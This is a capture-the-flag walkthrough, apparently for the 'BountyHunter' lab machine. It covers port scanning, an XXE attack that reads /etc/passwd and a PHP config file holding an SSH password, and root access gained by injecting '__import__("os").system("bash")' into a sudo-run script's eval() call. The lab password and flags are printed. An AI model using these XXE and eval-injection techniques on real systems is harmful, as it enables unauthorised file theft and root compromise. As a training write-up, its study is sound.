As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Fri Jun 24 12:23:35 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.11.100
Nmap scan report for 10.10.11.100
Host is up (0.067s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Fri Jun 24 12:23:48 2022 -- 1 IP address (1 host up) scanned in 13.45 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
If we take a look at the /portal.php directory, we'll see a message saying that the portal is under development, and it shows another page in /log_submit.php.
Let's take a look at the /log_submit.php page.
Let's try to fill of the input fields with the test word and hit on Submit.
Exploitation
It looks like the input is being represented by the server in the server response. Let's take a look at how the requests are being made. Intercept the request with BurpSuite,and send it to the repeater.
The POST request is sending a URL and Base64 encoded message. We can decode the message in BurpSuite by selecting the entire message, and pressing Ctrl+Shift+U to URL decoded it, and then Ctrl+Shift+B to base64 decode it. We should see an XML message.
At this point, we could try to do an XXE attack.
The XXE attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
In order to get the /etc/passwd file, we could create an external entity which will load a specific file.
If now we encode it to base64 with Ctrl+B and then encode it to URL with Ctrl+U, and then send the request, we should see the /etc/passwd file in the server response.
Now, we could see the content of the db.php file which we found on the subdirectories enumeration with gobuster. We'll have to use the wrapper php://filter/convert.base64-encode/resource=db.php so we get the content of the file base64 encoded.
If we decode the base64 string in the server response, we'll see some credentials.
Now, we could try to log in via SSH with the user development we found in the /etc/passwd file, and the password m19RoAU0hP41A1sTsq6K. Then, we could grab the user flag.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 24 Jun 2022 01:54:11 PM UTC
System load: 0.0
Usage of /: 24.2% of 6.83GB
Memory usage: 16%
Swap usage: 0%
Processes: 214
Users logged in: 0
IPv4 address for eth0: 10.10.11.100
IPv6 address for eth0: dead:beef::250:56ff:feb9:5f4b
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jul 21 12:04:13 2021 from 10.10.14.8
development@bountyhunter:~$ cat user.txt
e3251651591eaaceefd492d9007cb7cc
Privilege Escalation
If we take a look at the sudo permissions, we'll see that we can execute a script with Python3.8 as the root user.
sudo -l
Matching Defaults entries for development on bountyhunter:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
We can only read the script. Let's take a look at it.
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()
def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue
if x.startswith("__Ticket Code:__"):
code_line = i+1
continue
if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False
def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close
main()
Basically, the script is reading a file. That file should have the .md extensions, and it should start with the following lines.
# Skytrain Inc
## Ticket to
__Ticket Code:__
The next line should be ** followed by a number that if divided by 7, the remainder should be 4, for example the 11. Then it should end with a + sign followed by a random number.
**11+
Then, the script uses the eval() function. We could exploit this function, so when we execute the script, we will get a shell as root. The final test.md file should look like this.
# Skytrain Inc
## Ticket to
__Ticket Code:__
**11+8 and __import__("os").system("bash")
If we execute the script with sudo privileges, and indicate the test.md file, we should get a shell as the root user. And then all we have to do is reap the harvest and take the root flag.
Please enter the path to the ticket file.
test.md
Destination:
root@bountyhunter:/home/development# whoami
root
root@bountyhunter:/home/development# id
uid=0(root) gid=0(root) groups=0(root)
root@bountyhunter:/home/development# cat /root/root.txt
2b946c05b9ee9aea25eab3754353be74
